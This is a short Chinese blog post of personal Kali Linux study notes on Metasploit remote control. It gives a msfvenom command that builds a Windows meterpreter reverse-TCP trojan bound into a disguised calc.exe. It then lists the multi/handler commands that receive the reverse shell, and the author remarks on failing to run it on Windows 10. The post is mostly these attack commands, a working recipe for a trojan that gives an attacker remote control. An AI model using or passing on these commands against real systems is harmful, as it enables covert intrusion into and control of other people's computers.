kali的学习笔记篇(四)metasploit之远控

看的是15年的老电影了(教程)

msfpayload 15年就被丢弃了,搞了才发现被集成到msfvenom里了。

生成木马:

#参数 -p [指定攻击载荷名称]
#参数 -f [指定payload的输出格式]
#参数 -x 指定捆绑到哪个文件上
 msfvenom -p windows/meterpreter/reverse_tcp LHOST=[myIP] LPORT=[myPORT] -x /tmp/templates/64_calc.exe -f exe-only > /tmp/fake_64_calc.exe

win10不能执行,待今晚装完win7测试回来修改结果。

#执行handler模块
 use exploit/multi/handler
#装载攻击载荷添加反向tcp链接
set PAYLOAD windows/meterpreter/reverse_tcp
#反弹会话IP
set LHOST [myIP]
#反弹会话端口
set LPORT [myPORT]
#执行exploit

 

事实表明是模块没用好。嘻嘻新手踩大坑了-。-

  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值